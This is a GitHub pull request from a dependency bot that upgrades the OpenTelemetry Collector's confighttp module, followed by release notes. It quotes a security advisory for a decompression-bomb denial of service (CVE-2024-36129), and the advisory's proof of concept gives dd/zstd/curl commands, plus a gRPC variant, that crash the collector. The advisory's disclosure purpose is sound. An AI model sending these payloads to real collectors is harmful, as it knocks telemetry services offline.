Skip to content

Conversation

@renovate-sh-app
Copy link

@renovate-sh-app renovate-sh-app bot commented Oct 17, 2025

This PR contains the following updates:

Package Change Age Confidence
go.opentelemetry.io/collector/config/confighttp v0.96.0 -> v0.102.0 age confidence

Denial of Service via Zip/Decompression Bomb sent over HTTP or gRPC

CVE-2024-36129 / GHSA-c74f-6mfw-mm4v / GO-2024-2900

More information

Details

Summary

An unsafe decompression vulnerability allows unauthenticated attackers to crash the collector via excessive memory consumption.

Details

The OpenTelemetry Collector handles compressed HTTP requests by recognizing the Content-Encoding header, rewriting the HTTP request body, and allowing subsequent handlers to process decompressed data. It supports the gzip, zstd, zlib, snappy, and deflate compression algorithms. A "zip bomb" or "decompression bomb" is a malicious archive designed to crash or disable the system reading it. Decompression of HTTP requests is typically not enabled by default in popular server solutions due to associated security risks. A malicious attacker could leverage this weakness to crash the collector by sending a small request that, when uncompressed by the server, results in excessive memory consumption.

During proof-of-concept (PoC) testing, all supported compression algorithms could be abused, with zstd causing the most significant impact. Compressing 10GB of all-zero data reduced it to 329KB. Sending an HTTP request with this compressed data instantly consumed all available server memory (the testing server had 32GB), leading to an out-of-memory (OOM) kill of the collector application instance.

The root cause for this issue can be found in the following code path:

Affected File:
https://github.com/open-telemetry/opentelemetry-collector/[...]confighttp/compression.go

Affected Code:

// httpContentDecompressor offloads the task of handling compressed HTTP requests
// by identifying the compression format in the "Content-Encoding" header and re-writing
// request body so that the handlers further in the chain can work on decompressed data.
// It supports gzip and deflate/zlib compression.
func httpContentDecompressor(h http.Handler, eh func(w http.ResponseWriter, r *http.Request, errorMsg string, statusCode int), decoders map[string]func(body io.ReadCloser) (io.ReadCloser, error)) http.Handler {
    [...]
    d := &decompressor{
        errHandler: errHandler,
        base:   	h,
        decoders: map[string]func(body io.ReadCloser) (io.ReadCloser, error){
            "": func(io.ReadCloser) (io.ReadCloser, error) {
                // Not a compressed payload. Nothing to do.
                return nil, nil
            },
            [...]
            "zstd": func(body io.ReadCloser) (io.ReadCloser, error) {
                zr, err := zstd.NewReader(
                    body,
                    zstd.WithDecoderConcurrency(1),
                )
                if err != nil {
                    return nil, err
                }
                return zr.IOReadCloser(), nil
            },
    [...]
}

func (d *decompressor) ServeHTTP(w http.ResponseWriter, r *http.Request) {
    newBody, err := d.newBodyReader(r)
    if err != nil {
        d.errHandler(w, r, err.Error(), http.StatusBadRequest)
        return
    }
    [...]
    d.base.ServeHTTP(w, r)
}

func (d *decompressor) newBodyReader(r *http.Request) (io.ReadCloser, error) {
    encoding := r.Header.Get(headerContentEncoding)
    decoder, ok := d.decoders[encoding]
    if !ok {
        return nil, fmt.Errorf("unsupported %s: %s", headerContentEncoding, encoding)
    }
    return decoder(r.Body)
}

To mitigate this attack vector, it is recommended to either disable support for decompressing client HTTP requests entirely or limit the size of the decompressed data that can be processed. Limiting the decompressed data size can be achieved by wrapping the decompressed data reader inside an io.LimitedReader, which restricts the reading to a specified number of bytes. This approach helps prevent excessive memory usage and potential out-of-memory errors caused by decompression bombs.

PoC

This issue was confirmed as follows:

PoC Commands:

dd if=/dev/zero bs=1G count=10 | zstd > poc.zst
curl -vv "http://192.168.0.107:4318/v1/traces" -H "Content-Type: application/x-protobuf" -H "Content-Encoding: zstd" --data-binary @​poc.zst

Output:

10+0 records in
10+0 records out
10737418240 bytes (11 GB, 10 GiB) copied, 12,207 s, 880 MB/s

* processing: http://192.168.0.107:4318/v1/traces
*   Trying 192.168.0.107:4318...
* Connected to 192.168.0.107 (192.168.0.107) port 4318
> POST /v1/traces HTTP/1.1
> Host: 192.168.0.107:4318
> User-Agent: curl/8.2.1
> Accept: */*
> Content-Type: application/x-protobuf
> Content-Encoding: zstd
> Content-Length: 336655
>
* We are completely uploaded and fine
* Recv failure: Connection reset by peer
* Closing connection
curl: (56) Recv failure: Connection reset by peer

Server logs:

otel-collector-1  | 2024-05-30T18:36:14.376Z    info    [email protected]/service.go:102    Setting up own telemetry...
[...]
otel-collector-1  | 2024-05-30T18:36:14.385Z    info    [email protected]/otlp.go:152    Starting HTTP server    {"kind": "receiver", "name": "otlp", "data_type": "traces", "endpoint": "0.0.0.0:4318"}
otel-collector-1  | 2024-05-30T18:36:14.385Z    info    [email protected]/service.go:195    Everything is ready. Begin running and processing data.
otel-collector-1  | 2024-05-30T18:36:14.385Z    warn    localhostgate/featuregate.go:63    The default endpoints for all servers in components will change to use localhost instead of 0.0.0.0 in a future version. Use the feature gate to preview the new default.    {"feature gate ID": "component.UseLocalHostAsDefaultHost"}
otel-collector-1 exited with code 137

A similar problem exists for configgrpc when using the zstd compression:

dd if=/dev/zero bs=1G count=10 | zstd > poc.zst
python3 -c 'import os, struct; f = open("/tmp/body.raw", "w+b"); f.write(b"\x01"); f.write(struct.pack(">L", os.path.getsize("poc.zst"))); f.write(open("poc.zst", "rb").read())'
curl -vv http://127.0.0.1:4317/opentelemetry.proto.collector.trace.v1.TraceService/Export --http2-prior-knowledge -H "content-type: application/grpc" -H "grpc-encoding: zstd" --data-binary @​/tmp/body.raw
Impact

Unauthenticated attackers can crash the collector via excessive memory consumption, stopping the entire collection of telemetry.

Patches
  • The confighttp module version 0.102.0 contains a fix for this problem.
  • The configgrpc module version 0.102.1 contains a fix for this problem.
  • All official OTel Collector distributions starting with v0.102.1 contain both fixes.
Workarounds
  • None.
References
Credits

This issue was uncovered during a security audit performed by 7ASecurity, facilitated by OSTIF, for the OpenTelemetry project.

Severity

  • CVSS Score: 8.2 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Denial of Service via Zip/Decompression Bomb sent over HTTP or gRPC in go.opentelemetry.io/collector/config/configgrpc

CVE-2024-36129 / GHSA-c74f-6mfw-mm4v / GO-2024-2900

More information

Details

An unsafe decompression vulnerability allows unauthenticated attackers to crash the collector via excessive memory consumption.

Severity

Unknown

References

This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).


Release Notes

open-telemetry/opentelemetry-collector (go.opentelemetry.io/collector/config/confighttp)

v0.102.0

Compare Source

This release addresses GHSA-c74f-6mfw-mm4v for confighttp.

🛑 Breaking changes 🛑
  • envprovider: Restricts Environment Variable names. Environment variable names must now be ASCII only and start with a letter or an underscore, and can only contain underscores, letters, or numbers. (#​9531)
  • confighttp: Apply MaxRequestBodySize to the result of a decompressed body. This addresses GHSA-c74f-6mfw-mm4v for confighttp (#​10289)
    When using compressed payloads, the Collector would verify only the size of the compressed payload.
    This change applies the same restriction to the decompressed content. As a security measure, a limit of 20 MiB was added, which makes this a breaking change.
    For most clients, this shouldn't be a problem, but if you often have payloads that decompress to more than 20 MiB, you might want to either configure your
    client to send smaller batches (recommended), or increase the limit using the MaxRequestBodySize option.
💡 Enhancements 💡
  • mdatagen: auto-generate utilities to test component telemetry (#​19783)
  • mdatagen: support setting an AttributeSet for async instruments (#​9674)
  • mdatagen: support using telemetry level in telemetry builder (#​10234)
    This allows components to set the minimum level needed for them to produce telemetry. By default, this is set to configtelemetry.LevelBasic. If the telemetry level is below that minimum level, then the noop meter is used for metrics.
  • mdatagen: add support for bucket boundaries for histograms (#​10218)
  • releases: add documentation in how to verify the image signatures using cosign (#​9610)
🧰 Bug fixes 🧰
  • batchprocessor: ensure attributes are set on cardinality metadata metric (#​9674)
  • batchprocessor: Fixing processor_batch_metadata_cardinality which was broken in v0.101.0 (#​10231)
  • batchprocessor: respect telemetry level for all metrics (#​10234)
  • exporterhelper: Fix potential deadlocks in BatcherSender shutdown (#​10255)

v0.101.0

Compare Source

💡 Enhancements 💡
  • mdatagen: generate documentation for internal telemetry (#​10170)

  • mdatagen: add ability to use metadata.yaml to automatically generate instruments for components (#​10054)
    The telemetry section in metadata.yaml is used to generate
    instruments for components to measure telemetry about themselves.

  • confmap: Allow Converters to write logs during startup (#​10135)

  • otelcol: Enable logging during configuration resolution (#​10056)

🧰 Bug fixes 🧰
  • mdatagen: Run package tests when goleak is skipped (#​10125)

v0.100.0

Compare Source

🛑 Breaking changes 🛑
  • service: The validate sub-command no longer validates that each pipeline's type is the same as its component types (#​10031)
💡 Enhancements 💡
  • semconv: Add support for v1.25.0 semantic convention (#​10072)
  • builder: remove the need to go get a module to address ambiguous import paths (#​10015)
  • pmetric: Support parsing metric.metadata from OTLP JSON. (#​10026)
🧰 Bug fixes 🧰
  • exporterhelper: Fix enabled config option for batch sender (#​10076)

v0.99.0

Compare Source

🛑 Breaking changes 🛑
  • builder: Add strict version checking when using the builder. Add the temporary flag --skip-strict-versioning for skipping this check. (#​9896)
    Strict version checking will error on major and minor version mismatches
    between the otelcol_version configured and the builder version or versions
    in the go.mod. This check can be temporarily disabled by using the --skip-strict-versioning
    flag. This flag will be removed in a future minor version.

  • telemetry: Distributed internal metrics across different levels. (#​7890)
    The internal metrics levels are updated along with reported metrics:

    • The default level is changed from basic to normal, which can be overridden with service::telemetry::metrics::level configuration.
    • Batch processor metrics are updated to be reported starting from normal level:
      • processor_batch_batch_send_size
      • processor_batch_metadata_cardinality
      • processor_batch_timeout_trigger_send
      • processor_batch_size_trigger_send
    • GRPC/HTTP server and client metrics are updated to be reported starting from detailed level:
      • http.client.* metrics
      • http.server.* metrics
      • rpc.server.* metrics
      • rpc.client.* metrics
💡 Enhancements 💡
  • confighttp: Disable concurrency in zstd compression (#​8216)

  • cmd/builder: Allow configuring confmap.Providers in the builder. (#​4759)
    If no providers are specified, the defaults are used.
    The default providers are: env, file, http, https, and yaml.

    To configure providers, use the providers key in your OCB build
    manifest with a list of Go modules for your providers.
    The modules will work the same as other Collector components.

  • mdatagen: enable goleak tests by default via mdatagen (#​9959)

  • cmd/mdatagen: support excluding some metrics based on string and regexes in resource_attributes (#​9661)

  • cmd/mdatagen: Generate config and factory tests covering their requirements. (#​9940)
    The tests are moved from cmd/builder.

  • confmap: Add ProviderSettings, ConverterSettings, ProviderFactories, and ConverterFactories fields to confmap.ResolverSettings (#​9516)
    This allows configuring providers and converters, which are instantiated by NewResolver using the given factories.

🧰 Bug fixes 🧰
  • exporter/otlp: Allow DNS scheme to be used in endpoint (#​4274)
  • service: fix record sampler configuration (#​9968)
  • service: ensure the tracer provider is configured via go.opentelemetry.io/contrib/config (#​9967)
  • otlphttpexporter: Fixes a bug that was preventing the otlp http exporter from propagating status. (#​9892)
  • confmap: Fix decoding negative configuration values into uints (#​9060)

v0.98.0

Compare Source

🛑 Breaking changes 🛑
  • service: emit internal collector metrics with _ instead of / with OTLP export (#​9774)
    This is addressing an issue w/ the names of the metrics generated by the Collector for its
    internal metrics. Note that this change only impacts users that emit telemetry using OTLP, which
    is currently still in experimental support. The prometheus metrics already replaced / with _
    and they will do the same with _.
💡 Enhancements 💡
  • mdatagen: Adds unsupported platforms to the README header (#​9794)
  • confmap: Clarify the use of embedded structs to make unmarshaling composable (#​7101)
  • nopexporter: Promote the nopexporter to beta (#​7316)
  • nopreceiver: Promote the nopreceiver to beta (#​7316)
  • otlpexporter: Checks for port in the config validation for the otlpexporter (#​9505)
  • service: Validate pipeline type against component types (#​8007)
🧰 Bug fixes 🧰
  • configtls: Fix issue where IncludeSystemCACertsPool was not consistently used between ServerConfig and ClientConfig. (#​9835)
  • component: Fix issue where the components command wasn't properly printing the component type. (#​9856)
  • otelcol: Fix issue where the validate command wasn't properly printing valid component type. (#​9866)
  • receiver/otlp: Fix bug where the otlp receiver did not properly respond with a retryable error code when possible for http (#​9357)

v0.97.0

Compare Source

🛑 Breaking changes 🛑
  • telemetry: Remove telemetry.useOtelForInternalMetrics stable feature gate (#​9752)
🚀 New components 🚀
  • exporter/nop: Add the nopexporter to serve as a placeholder exporter in a pipeline (#​7316)
    This is primarily useful for starting the Collector with only extensions enabled
    or to test Collector pipeline throughput.

  • receiver/nop: Add the nopreceiver to serve as a placeholder receiver in a pipeline (#​7316)
    This is primarily useful for starting the Collector with only extensions enabled.

💡 Enhancements 💡
  • configtls: Validates TLS min_version and max_version (#​9475)
    Introduces Validate() method in TLSSetting.

  • configcompression: Mark module as Stable. (#​9571)

  • cmd/mdatagen: Use go package name for the scope name by default and add an option to provide the scope name in metadata.yaml. (#​9693)

  • cmd/mdatagen: Generate the lifecycle tests for components by default. (#​9683)
    It's encouraged to have lifecycle tests for all components enabled, but they can be disabled if needed
    in metadata.yaml with skip_lifecycle: true and skip_shutdown: true under tests section.

  • cmd/mdatagen: optimize the mdatagen for the case like batchprocessor which use a common struct to implement consumer.Traces, consumer.Metrics, consumer.Logs in the meantime. (#​9688)

🧰 Bug fixes 🧰
  • exporterhelper: Fix persistent queue size backup on reads. (#​9740)
  • processor/batch: Prevent starting unnecessary goroutines. (#​9739)
  • otlphttpexporter: prevent error on empty response body when content type is application/json (#​9666)
  • confmap: confmap honors Unmarshal methods on config embedded structs. (#​6671)
  • otelcol: Respect telemetry configuration when running as a Windows service (#​5300)

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Renovate Bot.

…ttp to v0.102.0 [security]

| datasource | package                                         | from    | to       |
| ---------- | ----------------------------------------------- | ------- | -------- |
| go         | go.opentelemetry.io/collector/config/confighttp | v0.96.0 | v0.102.0 |


Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com>
@renovate-sh-app
Copy link
Author

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

  • any of the package files in this branch needs updating, or
  • the branch becomes conflicted, or
  • you click the rebase/retry checkbox if found above, or
  • you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: go.sum
Command failed: go get -t ./...
go: github.com/prometheus/[email protected] (replaced by github.com/grafana/[email protected]): version "v0.12.2-0.20231005125903-364b9c41e595" invalid: unknown revision 364b9c41e595

@CLAassistant
Copy link

CLA assistant check
Thank you for your submission! We really appreciate it. Like many open source projects, we ask that you sign our Contributor License Agreement before we can accept your contribution.
You have signed the CLA already but the status is still pending? Let us recheck it.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant